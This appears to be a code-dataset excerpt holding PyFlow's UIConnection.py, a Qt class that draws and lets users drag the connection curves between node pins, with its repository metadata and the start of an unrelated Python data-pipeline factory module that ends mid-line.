PyFlow.UI.Utils.stylesheet import editableStyleSheet, Colors, ConnectionTypes\nfrom PyFlow.UI.Canvas.UICommon import NodeDefaults\nfrom PyFlow.UI.Canvas.Painters import ConnectionPainter\nfrom PyFlow.Core.Common import *\n\n\n\n# UIConnection between pins\nclass UIConnection(QGraphicsPathItem):\n \"\"\"UIConnection is a cubic spline curve. It represents connection between two pins.\n \"\"\"\n def __init__(self, source, destination, canvas):\n QGraphicsPathItem.__init__(self)\n self.setAcceptedMouseButtons(QtCore.Qt.LeftButton)\n self.setAcceptHoverEvents(True)\n self.setFlag(QGraphicsPathItem.ItemIsSelectable)\n self._menu = QMenu()\n self.actionDisconnect = self._menu.addAction(\"Disconnect\")\n self.actionDisconnect.triggered.connect(self.kill)\n self._uid = uuid4()\n self.canvasRef = weakref.ref(canvas)\n self.source = weakref.ref(source)\n self.destination = weakref.ref(destination)\n self.drawSource = self.source()\n self.drawDestination = self.destination()\n\n # Overrides for getting endpoints positions\n # if None - pin centers will be used\n self.sourcePositionOverride = None\n self.destinationPositionOverride = None\n\n self.mPath = QtGui.QPainterPath()\n\n self.cp1 = QtCore.QPointF(0.0, 0.0)\n self.cp2 = QtCore.QPointF(0.0, 0.0)\n\n self.setZValue(NodeDefaults().Z_LAYER - 1)\n\n self.color = self.source().color()\n self.selectedColor = self.color.lighter(150)\n\n self.thickness = 1\n self.thicknessMultiplier = 1\n if source.isExec():\n self.thickness = 2\n\n self.pen = QtGui.QPen(self.color, self.thickness, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n\n points = self.getEndPoints()\n self.updateCurve(points[0], points[1])\n\n self.setPen(self.pen)\n\n self.source().update()\n self.destination().update()\n self.fade = 0.0\n self.source().uiConnectionList.append(self)\n self.destination().uiConnectionList.append(self)\n self.source().pinConnected(self.destination())\n self.destination().pinConnected(self.source())\n self.prevPos = None\n self.linPath = None\n self.hOffsetL = 0.0\n self.hOffsetR = 0.0\n self.hOffsetLSShape = 0.0\n self.hOffsetRSShape = 0.0\n self.vOffset = 0.0\n self.vOffsetSShape = 0.0\n self.offsetting = 0\n self.snapVToFirst = True\n self.snapVToSecond = False\n self.sShape = False\n self.sameSide = 0\n self.hoverSegment = -1\n self.pressedSegment = -1\n if self.source().isExec():\n self.bubble = QGraphicsEllipseItem(-2.5, -2.5, 5, 5, self)\n self.bubble.setBrush(self.color)\n self.bubble.setPen(self.pen)\n\n point = self.mPath.pointAtPercent(0.0)\n self.bubble.setPos(point)\n\n self.bubble.hide()\n self.source()._rawPin.onExecute.connect(self.performEvaluationFeedback)\n self.shouldAnimate = False\n self.timeline = QtCore.QTimeLine(2000)\n self.timeline.setFrameRange(0, 100)\n self.timeline.frameChanged.connect(self.timelineFrameChanged)\n self.timeline.setLoopCount(0)\n\n def performEvaluationFeedback(self, *args, **kwargs):\n if self.timeline.state() == QtCore.QTimeLine.State.NotRunning:\n self.shouldAnimate = True\n # spawn bubble\n self.bubble.show()\n self.timeline.start()\n\n def timelineFrameChanged(self, frameNum):\n percentage = currentProcessorTime() - self.source()._rawPin.getLastExecutionTime()\n self.shouldAnimate = percentage < 0.5\n point = self.mPath.pointAtPercent(float(frameNum) / float(self.timeline.endFrame()))\n self.bubble.setPos(point)\n if not self.shouldAnimate:\n self.timeline.stop()\n self.bubble.hide()\n\n def setSelected(self, value):\n super(UIConnection, self).setSelected(value)\n\n def isUnderCollapsedComment(self):\n srcNode = self.source().owningNode()\n dstNode = self.destination().owningNode()\n srcComment = srcNode.owningCommentNode\n dstComment = dstNode.owningCommentNode\n if srcComment is not None and dstComment is not None and srcComment == dstComment and srcComment.collapsed:\n return True\n return False\n\n def isUnderActiveGraph(self):\n return self.canvasRef().graphManager.activeGraph() == self.source()._rawPin.owningNode().graph()\n\n def __repr__(self):\n return \"{0} -> {1}\".format(self.source().getFullName(), self.destination().getFullName())\n\n def setColor(self, color):\n self.pen.setColor(color)\n self.color = color\n\n def updateEndpointsPositions(self):\n srcNode = self.source().owningNode()\n dstNode = self.destination().owningNode()\n\n srcComment = srcNode.owningCommentNode\n if srcComment is not None:\n # if comment is collapsed or under another comment, move point to top most collapsed comment's right side\n srcNodeUnderCollapsedComment = srcComment.isUnderCollapsedComment()\n topMostCollapsedComment = srcNode.getTopMostOwningCollapsedComment()\n if srcComment.collapsed:\n rightSideEndpointGetter = srcComment.getRightSideEdgesPoint\n if srcNodeUnderCollapsedComment:\n rightSideEndpointGetter = topMostCollapsedComment.getRightSideEdgesPoint\n self.sourcePositionOverride = rightSideEndpointGetter\n else:\n if srcNodeUnderCollapsedComment:\n self.sourcePositionOverride = topMostCollapsedComment.getRightSideEdgesPoint\n else:\n self.sourcePositionOverride = None\n else:\n # if no comment return source point back to pin\n self.sourcePositionOverride = None\n\n # Same for right hand side\n dstComment = dstNode.owningCommentNode\n if dstComment is not None:\n dstNodeUnderCollapsedComment = dstComment.isUnderCollapsedComment()\n topMostCollapsedComment = dstNode.getTopMostOwningCollapsedComment()\n if dstComment.collapsed:\n rightSideEndpointGetter = dstComment.getLeftSideEdgesPoint\n if dstNodeUnderCollapsedComment:\n rightSideEndpointGetter = topMostCollapsedComment.getLeftSideEdgesPoint\n self.destinationPositionOverride = rightSideEndpointGetter\n else:\n if dstNodeUnderCollapsedComment:\n self.destinationPositionOverride = topMostCollapsedComment.getLeftSideEdgesPoint\n else:\n self.destinationPositionOverride = None\n else:\n self.destinationPositionOverride = None\n\n def Tick(self):\n # check if this instance represents existing connection\n # if not - destroy\n if not arePinsConnected(self.source()._rawPin, self.destination()._rawPin):\n self.canvasRef().removeConnection(self)\n\n if self.drawSource.isExec() or self.drawDestination.isExec():\n if self.thickness != 2:\n self.thickness = 2\n self.pen.setWidthF(self.thickness)\n\n if self.isSelected():\n self.pen.setColor(self.selectedColor)\n else:\n self.pen.setColor(self.color)\n self.update()\n\n def contextMenuEvent(self, event):\n self._menu.exec_(event.screenPos())\n\n @property\n def uid(self):\n return self._uid\n\n @uid.setter\n def uid(self, value):\n if self._uid in self.canvasRef().connections:\n self.canvasRef().connections[value] = self.canvasRef().connections.pop(self._uid)\n self._uid = value\n\n def applyJsonData(self, data):\n hOffsetL = data['hOffsetL']\n if hOffsetL is not None:\n self.hOffsetL = float(hOffsetL)\n hOffsetR = data['hOffsetR']\n if hOffsetR is not None:\n self.hOffsetR = float(hOffsetR)\n hOffsetLSShape = data['hOffsetLSShape']\n if hOffsetLSShape is not None:\n self.hOffsetLSShape = float(hOffsetLSShape)\n hOffsetRSShape = data['hOffsetRSShape']\n if hOffsetRSShape is not None:\n self.hOffsetRSShape = float(hOffsetRSShape)\n vOffset = data['vOffset']\n if vOffset is not None:\n self.vOffset = float(vOffset)\n vOffsetSShape = data['vOffsetSShape']\n if vOffsetSShape is not None:\n self.vOffsetSShape = float(vOffsetSShape)\n snapVToFirst = data['snapVToFirst']\n if snapVToFirst is not None:\n self.snapVToFirst = bool(snapVToFirst)\n snapVToSecond = data['snapVToSecond']\n if snapVToSecond is not None:\n self.snapVToSecond = bool(snapVToSecond)\n\n self.getEndPoints()\n\n def serialize(self):\n script = {'sourceUUID': str(self.source().uid),\n 'destinationUUID': str(self.destination().uid),\n 'sourceName': self.source()._rawPin.getFullName(),\n 'destinationName': self.destination()._rawPin.getFullName(),\n 'uuid': str(self.uid),\n 'hOffsetL': str(self.hOffsetL),\n 'hOffsetR': str(self.hOffsetR),\n 'hOffsetLSShape': str(self.hOffsetLSShape),\n 'hOffsetRSShape': str(self.hOffsetRSShape),\n 'vOffset': str(self.vOffset),\n 'vOffsetSShape': str(self.vOffsetSShape),\n 'snapVToFirst': int(self.snapVToFirst),\n 'snapVToSecond': int(self.snapVToSecond),\n }\n\n return script\n\n def __str__(self):\n return '{0} >>> {1}'.format(self.source()._rawPin.getFullName(), self.destination()._rawPin.getFullName())\n\n def drawThick(self):\n self.pen.setWidthF(self.thickness + (self.thickness / 1.5))\n f = 0.5\n r = abs(lerp(self.color.red(), Colors.Yellow.red(), clamp(f, 0, 1)))\n g = abs(lerp(self.color.green(), Colors.Yellow.green(), clamp(f, 0, 1)))\n b = abs(lerp(self.color.blue(), Colors.Yellow.blue(), clamp(f, 0, 1)))\n self.pen.setColor(QtGui.QColor.fromRgb(r, g, b))\n\n def restoreThick(self):\n self.pen.setWidthF(self.thickness)\n self.pen.setColor(self.color)\n\n def hoverEnterEvent(self, event):\n super(UIConnection, self).hoverEnterEvent(event)\n self.drawThick()\n self.update()\n\n def hoverLeaveEvent(self, event):\n super(UIConnection, self).hoverLeaveEvent(event)\n self.hoverSegment = -1\n self.restoreThick()\n self.update()\n\n def hoverMoveEvent(self, event):\n if self.offsetting == 0:\n self.hoverSegment = -1\n if self.linPath is not None:\n tempPath = ConnectionPainter.linearPath(self.linPath)\n t = self.percentageByPoint(event.scenePos(), tempPath)\n segments = []\n for i, pos in enumerate(self.linPath[:-1]):\n t1 = self.percentageByPoint(pos, tempPath)\n t2 = self.percentageByPoint(self.linPath[i + 1], tempPath)\n segments.append([t1, t2])\n for i, seg in enumerate(segments):\n if t > seg[0] and t < seg[1]:\n valid = []\n if not self.sShape:\n if self.snapVToFirst:\n valid = [0, 1]\n elif self.snapVToSecond:\n valid = [1, 2]\n else:\n valid = [1, 2, 3]\n else:\n valid = [1, 2, 3]\n if i in valid:\n self.hoverSegment = i\n else:\n self.hoverSegment = -1\n\n def getEndPoints(self):\n p1 = self.drawSource.scenePos() + self.drawSource.pinCenter()\n if self.sourcePositionOverride is not None:\n p1 = self.sourcePositionOverride()\n\n p2 = self.drawDestination.scenePos() + self.drawDestination.pinCenter()\n if self.destinationPositionOverride is not None:\n p2 = self.destinationPositionOverride()\n\n if editableStyleSheet().ConnectionMode[0] in [ConnectionTypes.Circuit, ConnectionTypes.ComplexCircuit]:\n self.sameSide = 0\n p1n, p2n = p1, p2\n xDistance = p2.x() - p1.x()\n if self.destination().owningNode()._rawNode.__class__.__name__ in [\"reroute\", \"rerouteExecs\"]:\n if xDistance < 0:\n p2n, p1n = p1, p2\n self.sameSide = 1\n if self.source().owningNode()._rawNode.__class__.__name__ in [\"reroute\", \"rerouteExecs\"]:\n if xDistance < 0:\n p1n, p2n = p1, p2\n self.sameSide = -1\n p1, p2 = p1n, p2n\n return p1, p2\n\n def percentageByPoint(self, point, path, precision=0.5, width=20.0):\n percentage = -1.0\n stroker = QtGui.QPainterPathStroker()\n stroker.setWidth(width)\n strokepath = stroker.createStroke(path)\n t = 0.0\n d = []\n while t <= 100.0:\n d.append(QtGui.QVector2D(point - path.pointAtPercent(t / 100)).length())\n t += precision\n percentage = d.index(min(d)) * precision\n return percentage\n\n def mousePressEvent(self, event):\n super(UIConnection, self).mousePressEvent(event)\n t = self.percentageByPoint(event.scenePos(), self.mPath)\n self.prevPos = event.pos()\n\n if abs(self.mPath.slopeAtPercent(t * 0.01)) < 1:\n self.offsetting = 1\n else:\n self.offsetting = 2\n\n if self.linPath is not None:\n tempPath = ConnectionPainter.linearPath(self.linPath)\n t = self.percentageByPoint(event.scenePos(), tempPath)\n segments = []\n for i, pos in enumerate(self.linPath[:-1]):\n t1 = self.percentageByPoint(pos, tempPath)\n t2 = self.percentageByPoint(self.linPath[i + 1], tempPath)\n segments.append([t1, t2])\n for i, seg in enumerate(segments):\n if t > seg[0] and t < seg[1]:\n valid = []\n if not self.sShape:\n if self.snapVToFirst:\n valid = [0, 1]\n elif self.snapVToSecond:\n valid = [1, 2]\n else:\n valid = [1, 2, 3]\n else:\n valid = [1, 2, 3]\n if i in valid:\n self.pressedSegment = i\n else:\n self.pressedSegment = -1\n p1, p2 = self.getEndPoints()\n offset1 = editableStyleSheet().ConnectionOffset[0]\n offset2 = -offset1\n if self.sameSide == 1:\n offset2 = offset1\n elif self.sameSide == -1:\n offset1 = offset2\n xDistance = (p2.x() + offset2) - (p1.x() + offset1)\n self.sShape = xDistance < 0\n event.accept()\n\n def mouseReleaseEvent(self, event):\n super(UIConnection, self).mouseReleaseEvent(event)\n self.offsetting = 0\n self.pressedSegment = -1\n\n event.accept()\n\n def mouseMoveEvent(self, event):\n super(UIConnection, self).mouseMoveEvent(event)\n if self.prevPos is not None:\n delta = self.prevPos - event.pos()\n p1, p2 = self.getEndPoints()\n if not self.sShape:\n if self.offsetting == 1:\n doIt = True\n if self.snapVToFirst and self.pressedSegment != 0:\n doIt = False\n self.pressedSegment = -1\n elif self.snapVToSecond and self.pressedSegment != 2:\n doIt = False\n self.pressedSegment = -1\n elif not self.snapVToFirst and not self.snapVToSecond:\n if self.pressedSegment != 2:\n doIt = False\n self.pressedSegment = -1\n if doIt:\n self.vOffset -= float(delta.y())\n if abs(self.vOffset) <= 3:\n self.snapVToFirst = True\n self.pressedSegment = 0\n else:\n self.snapVToFirst = False\n if p1.y() + self.vOffset > p2.y() - 3 and p1.y() + self.vOffset < p2.y() + 3:\n self.snapVToSecond = True\n self.pressedSegment = 2\n else:\n self.snapVToSecond = False\n if not self.snapVToFirst and self.pressedSegment == 0:\n self.pressedSegment = 2\n\n if self.offsetting == 2:\n if self.snapVToFirst:\n self.hOffsetR -= float(delta.x())\n elif self.snapVToSecond:\n self.hOffsetL -= float(delta.x())\n else:\n if self.pressedSegment == 1:\n self.hOffsetL -= float(delta.x())\n elif self.pressedSegment == 3:\n self.hOffsetR -= float(delta.x())\n else:\n if self.offsetting == 1 and self.pressedSegment == 2:\n self.vOffsetSShape -= float(delta.y())\n elif self.offsetting == 2:\n if self.pressedSegment == 1:\n self.hOffsetRSShape -= float(delta.x())\n elif self.pressedSegment == 3:\n self.hOffsetLSShape -= float(delta.x())\n\n self.prevPos = event.pos()\n\n event.accept()\n\n def source_port_name(self):\n return self.source().getFullName()\n\n def shape(self):\n qp = QtGui.QPainterPathStroker()\n qp.setWidth(10.0)\n qp.setCapStyle(QtCore.Qt.SquareCap)\n return qp.createStroke(self.path())\n\n def updateCurve(self, p1, p2):\n xDistance = p2.x() - p1.x()\n multiply = 3\n self.mPath = QtGui.QPainterPath()\n\n self.mPath.moveTo(p1)\n if xDistance < 0:\n self.mPath.cubicTo(QtCore.QPoint(p1.x() + xDistance / -multiply, p1.y()),\n QtCore.QPoint(p2.x() - xDistance / -multiply, p2.y()), p2)\n else:\n self.mPath.cubicTo(QtCore.QPoint(p1.x() + xDistance / multiply,\n p1.y()), QtCore.QPoint(p2.x() - xDistance / 2, p2.y()), p2)\n\n self.setPath(self.mPath)\n\n def kill(self):\n self.canvasRef().removeConnection(self)\n\n def paint(self, painter, option, widget):\n option.state &= ~QStyle.State_Selected\n\n lod = self.canvasRef().getCanvasLodValueFromCurrentScale()\n\n self.setPen(self.pen)\n p1, p2 = self.getEndPoints()\n roundness = editableStyleSheet().ConnectionRoundness[0]\n offset = editableStyleSheet().ConnectionOffset[0]\n offset1 = offset\n offset2 = -offset1\n if self.sameSide == 1:\n offset2 = offset1\n elif self.sameSide == -1:\n offset1 = offset2\n xDistance = (p2.x() + offset2) - (p1.x() + offset1)\n self.sShape = xDistance < 0\n sectionPath = None\n if editableStyleSheet().ConnectionMode[0] == ConnectionTypes.Circuit:\n seg = self.hoverSegment if self.hoverSegment != -1 and self.linPath and self.pressedSegment == -1 else self.pressedSegment\n self.mPath, self.linPath, sectionPath = ConnectionPainter.BasicCircuit(p1, p2, offset, roundness, self.sameSide, lod, False, self.vOffset, self.hOffsetL, self.vOffsetSShape, self.hOffsetR, self.hOffsetRSShape, self.hOffsetLSShape, self.snapVToFirst, self.snapVToSecond, seg)\n elif editableStyleSheet().ConnectionMode[0] == ConnectionTypes.ComplexCircuit:\n self.mPath, self.linPath, sectionPath = ConnectionPainter.BasicCircuit(p1, p2, offset, roundness, self.sameSide, lod, True)\n elif editableStyleSheet().ConnectionMode[0] == ConnectionTypes.Cubic:\n self.mPath = ConnectionPainter.Cubic(p1, p2, 150, lod)\n self.linPath = None\n elif editableStyleSheet().ConnectionMode[0] == ConnectionTypes.Linear:\n self.mPath, _ = ConnectionPainter.Linear(p1, p2, offset, roundness, lod)\n self.linPath = None\n if self.snapVToSecond and self.offsetting == 0:\n self.vOffset = p2.y() - p1.y()\n self.setPath(self.mPath)\n\n super(UIConnection, self).paint(painter, option, widget)\n pen = QtGui.QPen()\n pen.setColor(editableStyleSheet().MainColor)\n pen.setWidthF(self.thickness + (self.thickness / 1.5))\n painter.setPen(pen)\n if sectionPath:\n painter.drawPath(sectionPath)\n", "repo_name": "wonderworks-software/PyFlow", "sub_path": "PyFlow/UI/Canvas/UIConnection.py", "file_name": "UIConnection.py", "file_ext": "py", "file_size_in_byte": 21496, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2099, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Qt.QtWidgets.QGraphicsPathItem", "line_number": 19, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QGraphicsPathItem.__init__", "line_number": 23, "usage_type": "call"}, {"api_name": "Qt.QtWidgets.QGraphicsPathItem", "line_number": 23, "usage_type": "name"}, {"api_name": "Qt.QtCore.Qt", "line_number": 24, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 24, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QGraphicsPathItem.ItemIsSelectable", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets.QGraphicsPathItem", "line_number": 26, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QMenu", "line_number": 27, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 30, "usage_type": "call"}, {"api_name": "weakref.ref", "line_number": 31, "usage_type": "call"}, {"api_name": "weakref.ref", "line_number": 32, "usage_type": "call"}, {"api_name": "weakref.ref", "line_number": 33, "usage_type": "call"}, {"api_name": "Qt.QtGui.QPainterPath", "line_number": 42, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 42, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPointF", "line_number": 44, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 44, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPointF", "line_number": 45, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 45, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.UICommon.NodeDefaults", "line_number": 47, "usage_type": "call"}, {"api_name": "Qt.QtGui.QPen", "line_number": 57, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 57, "usage_type": "name"}, {"api_name": "Qt.QtCore.Qt", "line_number": 57, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 57, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QGraphicsEllipseItem", "line_number": 87, "usage_type": "call"}, {"api_name": "Qt.QtCore.QTimeLine", "line_number": 97, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 97, "usage_type": "name"}, {"api_name": "Qt.QtCore.QTimeLine", "line_number": 103, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 103, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow.red", "line_number": 263, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow", "line_number": 263, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors", "line_number": 263, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow.green", "line_number": 264, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow", "line_number": 264, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors", "line_number": 264, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow.blue", "line_number": 265, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow", "line_number": 265, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors", "line_number": 265, "usage_type": "name"}, {"api_name": "Qt.QtGui.QColor.fromRgb", "line_number": 266, "usage_type": "call"}, {"api_name": "Qt.QtGui.QColor", "line_number": 266, "usage_type": "attribute"}, {"api_name": "Qt.QtGui", "line_number": 266, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.linearPath", "line_number": 287, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 287, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 320, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.Circuit", "line_number": 320, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 320, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.ComplexCircuit", "line_number": 320, "usage_type": "attribute"}, {"api_name": "Qt.QtGui.QPainterPathStroker", "line_number": 337, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 337, "usage_type": "name"}, {"api_name": "Qt.QtGui.QVector2D", "line_number": 343, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 343, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.linearPath", "line_number": 359, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 359, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 383, "usage_type": "call"}, {"api_name": "Qt.QtGui.QPainterPathStroker", "line_number": 460, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 460, "usage_type": "name"}, {"api_name": "Qt.QtCore.Qt", "line_number": 462, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 462, "usage_type": "name"}, {"api_name": "Qt.QtGui.QPainterPath", "line_number": 468, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 468, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPoint", "line_number": 472, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 472, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPoint", "line_number": 473, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 473, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPoint", "line_number": 475, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 475, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPoint", "line_number": 476, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 476, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QStyle.State_Selected", "line_number": 484, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets.QStyle", "line_number": 484, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 490, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 491, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 501, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.Circuit", "line_number": 501, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 501, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.BasicCircuit", "line_number": 503, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 503, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 504, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.ComplexCircuit", "line_number": 504, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 504, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.BasicCircuit", "line_number": 505, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 505, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 506, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.Cubic", "line_number": 506, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 506, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.Cubic", "line_number": 507, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 507, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 509, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.Linear", "line_number": 509, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 509, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.Linear", "line_number": 510, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 510, "usage_type": "name"}, {"api_name": "Qt.QtGui.QPen", "line_number": 517, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 517, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 518, "usage_type": "call"}]} +{"seq_id": "15321840395", "text": "# pylint: disable=invalid-name\n\nfrom data.pipeline.datatypes.dimension_cleaner import DimensionCleaner\nfrom data.pipeline.datatypes.dimension_collector import DimensionCollector\nfrom data.pipeline.datatypes.full_dimension_data_collector import (\n FullRowDimensionDataCollector,\n)\nfrom util.file.unicode_csv import UnicodeDictReader\n\n\n# Create a customized subclass of the DimensionCollector.\ndef _subclass_dimension_collector(hierarchical_dimensions, non_hierarchical_dimensions):\n class ChildDimensionCollector(DimensionCollector):\n HIERARCHICAL_DIMENSIONS = hierarchical_dimensions\n NON_HIERARCHICAL_DIMENSIONS = non_hierarchical_dimensions\n\n return ChildDimensionCollector\n\n\n# Create a customized subclass of the DimensionCleaner.\ndef _subclass_dimension_cleaner(dimension_collector_cls):\n class ChildDimensionCleaner(DimensionCleaner):\n def __init__(self, dimension_name_to_row_mapping=None):\n super().__init__(dimension_collector_cls, dimension_name_to_row_mapping)\n\n return ChildDimensionCleaner\n\n\n# Create a customized subclass of the FullRowDimensionDataCollector.\ndef _subclass_full_dimension_data_collector(\n hierarchical_dimensions, non_hierarchical_dimensions, clean_prefix, canonical_prefix\n):\n class ChildCanonicalAndMetadataCollector(FullRowDimensionDataCollector):\n def __init__(self):\n super().__init__(\n canonical_prefix,\n clean_prefix,\n hierarchical_dimensions,\n non_hierarchical_dimensions,\n )\n\n return ChildCanonicalAndMetadataCollector\n\n\n# Override a default value if the argument is non None. Explicitly checking\n# for None here instead of not bool(argument).\ndef _maybe_override(argument, default):\n return argument if argument is not None else default\n\n\nclass DimensionFactory:\n '''This factory class is useful for cleanly customizing the dimension\n transformation classes based on a known set of paramaters.\n '''\n\n def __init__(\n self,\n hierarchical_dimensions,\n non_hierarchical_dimensions,\n raw_prefix,\n clean_prefix,\n canonical_prefix,\n default_dimension_collector_cls=None,\n default_dimension_cleaner_cls=None,\n default_canonical_metadata_collector_cls=None,\n ):\n self.hierarchical_dimensions = hierarchical_dimensions\n self.non_hierarchical_dimensions = non_hierarchical_dimensions\n self.matched_dimensions = hierarchical_dimensions + non_hierarchical_dimensions\n self.raw_prefix = raw_prefix\n self.clean_prefix = clean_prefix\n self.canonical_prefix = canonical_prefix\n\n # Setup default classes (they will be lazily created if they are None).\n # Only override these if you need a custom class to be used all factory\n # users instead of the default customized class the factory would\n # normally produce.\n self._default_dimension_collector_cls = default_dimension_collector_cls\n self._default_dimension_cleaner_cls = default_dimension_cleaner_cls\n self._default_canonical_metadata_collector_cls = (\n default_canonical_metadata_collector_cls\n )\n\n @property\n def DimensionCollector(\n self, hierarchical_dimensions=None, non_hierarchical_dimensions=None\n ):\n '''Returns a customized DimensionCollector subclass tailored to the\n stored dimension config. Both hierarchical and non-hierarchical\n dimensions can be customized independently of the stored versions, if\n needed. The default should be preferred.\n '''\n if (\n hierarchical_dimensions is not None\n or non_hierarchical_dimensions is not None\n ):\n h_dims = _maybe_override(\n hierarchical_dimensions, self.hierarchical_dimensions\n )\n nh_dims = _maybe_override(\n non_hierarchical_dimensions, self.non_hierarchical_dimensions\n )\n return _subclass_dimension_collector(h_dims, nh_dims)\n\n if not self._default_dimension_collector_cls:\n self._default_dimension_collector_cls = _subclass_dimension_collector(\n self.hierarchical_dimensions, self.non_hierarchical_dimensions\n )\n return self._default_dimension_collector_cls\n\n @property\n def DimensionCleaner(self, dimension_collector_cls=None):\n '''Returns a customized DimensionCleaner subclass tailored to the stored\n dimension config. An optional dimension collector class can be passed in\n for additional customization of the returned class, however the default\n should be preferred.\n '''\n if dimension_collector_cls:\n return _subclass_dimension_cleaner(dimension_collector_cls)\n\n if not self._default_dimension_cleaner_cls:\n self._default_dimension_cleaner_cls = _subclass_dimension_cleaner(\n self.DimensionCollector\n )\n return self._default_dimension_cleaner_cls\n\n @property\n def CanonicalAndMetadataCollector(\n self,\n hierarchical_dimensions=None,\n non_hierarchical_dimensions=None,\n clean_prefix=None,\n canonical_prefix=None,\n ):\n '''Returns a customized FullRowDimensionDataCollector subclass tailored\n to the stored dimension and output row config. All parameters can be\n customized, however the default should be preferred.\n '''\n if (\n hierarchical_dimensions is not None\n or non_hierarchical_dimensions is not None\n or clean_prefix is not None\n or canonical_prefix is not None\n ):\n return _subclass_full_dimension_data_collector(\n _maybe_override(hierarchical_dimensions, 